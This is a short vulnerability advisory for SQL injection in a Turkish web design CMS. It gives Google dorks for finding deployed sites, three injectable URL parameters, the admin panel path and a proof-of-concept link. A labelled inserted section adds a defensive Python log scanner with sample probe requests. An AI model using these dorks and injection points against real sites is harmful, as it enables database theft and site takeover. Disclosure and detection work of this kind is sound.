#################################################################################################
# Exploit Title : BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : asmwebsitesi.net ~ birwebmaster.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dorks :
inurl:''/index.php?sayfa=DuyuruOku''
intext:''Asmwebsitesi.net Asm Web Sitesi''
intext:''BirWebMaster Web Tasarım Hizmetleri''
# Exploits :
/index.php?sayfa=DuyuruOku&id=[SQL Inj]
/index.php?sayfa=SayfaOku&SayfaId=[SQL Inj]
/index.php?sayfa=Galeri&islem=ResimGoster&id=[ID-NUMBER]&page=[SQL Inj]
# Admin Login Panel Path : /admin/index.php
#################################################################################################
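Added example (not part of the original advisory, and not the vendor's code): a log-review check that flags requests to the three routes listed above when the affected parameter is not a plain integer. The combined access-log format, the constructed sample lines, and the assumption that `id`, `SayfaId` and `page` only ever carry integers are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Routes and parameters named in the advisory; each is assumed to carry an integer.
WATCHED = {
    "DuyuruOku": ("id",),
    "SayfaOku": ("SayfaId",),
    "Galeri": ("id", "page"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for watched params that are not plain integers."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/index.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    hits = []
    for page in query.get("sayfa", []):
        for name in WATCHED.get(page, ()):
            for value in query.get(name, []):
                if not re.fullmatch(r"[0-9]{1,10}", value):
                    hits.append((name, value))
    return hits

def scan(log_lines):
    """Yield (client_ip, request_target, hits) for access-log lines worth reviewing."""
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group(1))
        if hits:
            yield line.split(" ", 1)[0], m.group(1), hits

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2018:10:00:01 +0300] "GET /index.php?sayfa=DuyuruOku&id=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jun/2018:10:00:05 +0300] "GET /index.php?sayfa=DuyuruOku&id=2%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [30/Jun/2018:10:00:09 +0300] "GET /index.php?sayfa=Galeri&islem=ResimGoster&id=4&page=1%27 HTTP/1.1" 200 298',
    '192.0.2.10 - - [30/Jun/2018:10:00:12 +0300] "GET /index.php?sayfa=SayfaOku&SayfaId=3 HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, hits)
```

The same integer-only rule belongs in the application itself, ahead of a parameterized query; the log check only shows where the parameters are already being probed.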
# Example Vulnerable SQL Sites =>
[ Proof of Concept for SQL Inj ] => archive.is/Jvfcu
# SQL Database Error =>
Warning: session_start(): Cannot send session cache limiter - headers already sent
(output started at /home/cumasm/public_html/index.php:1) in /home/cumasm/public_html/db.php on line 7
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################